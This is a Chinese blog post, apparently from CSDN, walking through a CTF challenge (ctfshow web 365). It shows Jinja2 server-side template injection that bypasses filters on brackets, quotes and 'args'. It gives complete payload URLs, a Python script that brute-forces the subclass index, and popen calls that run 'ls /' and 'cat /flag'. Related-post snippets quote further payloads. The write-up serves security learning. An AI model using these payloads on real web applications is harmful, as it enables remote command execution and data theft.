SSTI模板注入-中括号、args、单双引号被过滤绕过(ctfshow web入门365)

最新推荐文章于 2024-05-10 01:51:45 发布
最新推荐文章于 2024-05-10 01:51:45 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: SSTI模板注入 CTFShow 文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52635170/article/details/129815834
版权

SSTI模板注入-中括号、args、单双引号被过滤绕过(ctfshow web入门365)

绕过技巧

对于单双引号的被过滤,只要是为了防止我们获取基类和输入命令字符串的,而我们获取基类并不一定非要单双引号,还有可以用到小括号,而我们输入命令字符串可以使用传参的方式。对于args被过滤主要是为了防止使用request.args.参数 的形式将命令字符串进行传参,而args被过滤,我们可以使用request.values.参数 进行传参一样可以。中括号被过滤主要是为了防止我们通过所有子类的索引值获取可以执行OSshell命令的子类的,中括号被过滤的话我们可以通过__getitem__()方法来获取我们想要的子类和方法,getitem(),即可以数字传参也可以字符串传参,也就是我们既可以通过索引值来获取,也可以通过名字来获取。

实例引入-ctfshow web入门365

1、判断是否存在SSTI模板注入漏洞

传参?name={{7*7}}看页面是否输出49,如果回显49,即存在SSTI模板注入漏洞。
在这里插入图片描述
发现页面回显了49,代表该站点存在SSTI模板注入漏洞。

2、获得内置类所对应的类

由于该题目的单双引号和中括号被过滤了,所以我们这里就是用小括号来获取内置类所对应的类。

http://d1e0610c-a104-4668-8e0a-037385125f39.challenge.ctf.show/?name={{().__class__}}

在这里插入图片描述

3、获得object基类

使用.__base__或者.mro[1]来获取object基类。由于中括号被过滤了,我们就使用.getitem(1)来获取。

http://d1e0610c-a104-4668-8e0a-037385125f39.challenge.ctf.show/?name={{().__class__.__mro__.__getitem__(1)}}

在这里插入图片描述

4、获得所有子类

使用.subclasses()来获取所有的子类。

http://d1e0610c-a104-4668-8e0a-037385125f39.challenge.ctf.show/?name={{().__class__.__mro__.__getitem__(1).__subclasses__()}}

在这里插入图片描述

5、获得含有可以执行shell命令方法的类

我们还是以popen()方法为例,我们来编写python脚本使用reqests模块来对地址"http://d1e0610c-a104-4668-8e0a-037385125f39.challenge.ctf.show/?name={{().class.mro.getitem(1).subclasses().getitem(132).init.globals.getitem(request.values.a)}}&a=popen"循环发送请求,每次请求只改变.getitem(132)里面的数值,然后获取请求返回的源代码,判断源码中是否含有popen字符,如果有记录下当前请求中.getitem(数值)的数值的值,即我们要获得类的索引值。

import requests

for num in range(500):
    url = "http://d1e0610c-a104-4668-8e0a-037385125f39.challenge.ctf.show/?name={{().__class__.__mro__.__getitem__(1).__subclasses__().__getitem__(" + str(num) + ").__init__.__globals__.__getitem__(request.values.a)}}&a=popen"
    res = requests.get(url).text
    if "popen" in res:
        print(num)
        break

在这里插入图片描述
获得到需要的子类的索引值为132。

6、获得可以执行shell命令的方法

其实上步中,我们以popen()方法为例,就已经获取到了执行shell命令的方法了,我们在上步中,用传参的方式获取执行shell命令的方法,因为我们不能以字符串的方式直接写进去获取,因为字符串需要用单双引号来包裹起来,故我们使用request.values.参数 的方式传参。

http://d1e0610c-a104-4668-8e0a-037385125f39.challenge.ctf.show/?name={{().__class__.__mro__.__getitem__(1).__subclasses__().__getitem__(132).__init__.__globals__.__getitem__(request.values.a)}}&a=popen

在这里插入图片描述

7、执行shell命令获取flag

找到了执行shell命令的方法我们就可以直接执行shell命令了,因为我们输入的shell命令也是一个字符串,直接写在方法里的话还是得用单双引号包裹,引号被过滤,还是得用reqest.values.参数 的方式进行传参。并且在后面要用.read()的方法读取,因为popen()返回的是一个file对象,我们必须读取这个对象才能获取到shell命令的执行结果。

http://d1e0610c-a104-4668-8e0a-037385125f39.challenge.ctf.show/?name={{().__class__.__mro__.__getitem__(1).__subclasses__().__getitem__(132).__init__.__globals__.__getitem__(request.values.a)(request.values.b).read()}}&a=popen&b=ls /

在这里插入图片描述
发现在根目录中存在flag文件直接cat读取。

http://d1e0610c-a104-4668-8e0a-037385125f39.challenge.ctf.show/?name={{().__class__.__mro__.__getitem__(1).__subclasses__().__getitem__(132).__init__.__globals__.__getitem__(request.values.a)(request.values.b).read()}}&a=popen&b=cat /flag

在这里插入图片描述
成功拿下!

你们de4月天
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF之路:关于Flask模板注入
zw05011的博客
01-07 5762
题目 题目叫Simple SSTI 打开网页,显示You need pass in a parameter named flag. SSTI,即服务器端模板注入
CTF模板注入
weixin_43952190的博客
07-30 4192
模板注入赛题 1. [护网杯 2018]easy_tornado 进入后三个链接 /flag.txt # flag in /fllllllllllllag /welcome.txt #提示render(渲染) /hint.txt #提示md5(cookie_secret+md5(filename)) url上两个参数:filename&filehash 根据提示,要查看flag,已经知道了文件名,filehash也知道了构
网络安全最新SSTI模板注入详细总结及WAF绕过_fenjing ssti(2),腾讯3轮面试都问了网络安全事件分发
最新发布
2401_84545016的博客
05-10 360
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
SSTI模板注入-括号args、下划线、双引号、双大括号过滤绕过ctfshow web入门368)
T1ngSh0w的博客
03-29 954
SSTI模板注入漏洞 括号args、下划线、双引号、双大括号过滤 ctfshow web入门368
ctfshow web入门 ssti过滤引号+args
c1516175954的博客
09-21 102
在上一关的payload的基础上(即数组形式+args),将args替换为values。args引号被过滤
SSTI模板注入-括号args、下划线、双引号、os、request、花括号、数字被过滤绕过ctfshow web入门370)
T1ngSh0w的博客
03-30 1382
ctfshow web入门370 括号args、request、下划线、引号、花括号、数字、os被过滤 SSTI模板注入漏洞
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板,然后在服务器端执行该模板模板引擎旨在通过将固定模板与易失性数据结合来生成网页。 当用户输入直接连接到模板而不是作为数据传递...
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
Server-Side Template Injection (SSTI) 是一种严重的网络安全漏洞,尤其在现代Web应用程序,它可能导致远程代码执行(RCE)。2015年,James Kettle在黑帽大会上详细阐述了这种攻击方式,强调了它如何被误认为是跨...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
gentlexue#POC-3#Apache OfBiz 服务器端模板注入SSTI)1
07-25
Apache OfBiz 服务器端模板注入SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI)的影响,从而导致远程代码执行
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过SSTI,即Server-Side Template Injection,是针对服务器端模板引擎的一种安全漏洞,允许攻击者通过注入恶意代码来控制模板渲染过程,从而获取敏感信息或...
从零开始学习CTF,成为顶尖选手的完美路线
Hacker0830的博客
04-24 1501
CTF(夺旗赛)是一种网络安全竞赛,通过解决一系列安全问题来测试参赛者的技能和经验。对于网络安全爱好者和从业者来说,学习CTF是一个不错的选择。学习CTF需要时间和精力,但是它也是一个非常有意思的过程。在你学习的过程,需要注重实战练习,并且参加CTF竞赛可以帮助你将所学的知识应用到实际情况。希望以上的学习规划和路线可以帮助你从零开始学习CTFt=N3I4CTF从0到1基础教程笔记https://mp.weixin.qq.com/s?
CTF-WEB学习-模板注入-[护网杯 2018]easy_tornado
qq_43564182的博客
07-04 432
CTF-WEB学习-模板注入-[护网杯 2018]easy_tornado 文章目录CTF-WEB学习-模板注入-[护网杯 2018]easy_tornado解题网页出现cookie: ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210704232702503.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0
攻防世界Web:Confusion1
Light_inthe_eyes的博客
10-17 197
打开页面,看见一张图片,点击Home、Login、Register都没用: 看看源代码,在Register.php发现一点提示: 但没什么思路,去网上看了看WP,觉得这道题的提示就很扯,那张图片提示了是SSTI?!就因为图片是蛇吞象意味着python干掉php?!想了想,是我还不够头脑风暴,那就按着这个思路往下做吧,简测试一下: payload:{{''.__class__.__mro__[2].__subclasses__()}},发现不行,也许是过滤了某些字符吧: 但没有过滤request,re
CTF命令执行小总结
n00bk1ng的博客
05-18 1461
文章目录简介命令执行常见命令及解释执行常见系统命令函数绕过姿势绕过总结函数套娃特殊题无字母无数字命令执行通过文件包含、文件上传拿shell进行命令执行FFI类型题例题ctfshow web31ctfshow web124 简介 命令执行 命令执行:攻击者可以通过web应用执行系统命令,从而获取敏感信息,甚至拿到shell权限等等,造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行。 常见命令及解释 执行常见系统命令 常见的系统命令可以进行命令执行: awk 格式:awk'{printf
SSTI详解 一文了解SSTI和所有常见payload 以flask模板为例
闵行小鱼塘
10-13 5501
做的ctf题里有好几道跟SSTI有关,故对SSTI进行学习,在此做个小结与记录
CTFSHOW-SSTI
Yb_140的博客
04-30 476
认识SSTI https://xz.aliyun.com/t/3679 SSTI模板注入绕过(进阶篇)_yu22x的博客-CSDN博客_ssti绕过 CTFshow-WEB入门-SSTI_bfengj的博客-CSDN博客 web361 ?name={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }} ?name={{ config.__class__.__init__.__globals__['
SSTI模板注入
qq_48904485的博客
03-22 5005
一、SSTI简介 SSTI就是服务器端模板注入(Server-Side Template Injection),SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。 sql注入是从用户获得一个输入,然后又后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。 SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到
5.14对SSTI的复习
E1even的博客
05-17 603
一开始拿到一个SSTI题目不知如何下手,写此文的目的也是为了复习一下前面学的基础知识。这里从最简的用到的命令字典进行讲解: 整个基础快速讲解无任何过滤和rebuild 首先我们需要知道以下魔术对象作用: __class__ :返回类型所属的对象 __mro__ :返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。 __base__ "返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的 __subclasses__ 获取当前类的所有子类
"详解现代Web应用的服务器端模板注入RCE:2015年黑帽大会精要
Server-Side Template Injection (SSTI) is a critical vulnerability that is often overlooked and mistaken for Cross-Site Scripting (XSS). In 2015, James Kettle presented a detailed analysis on SSTI in ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

你们de4月天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值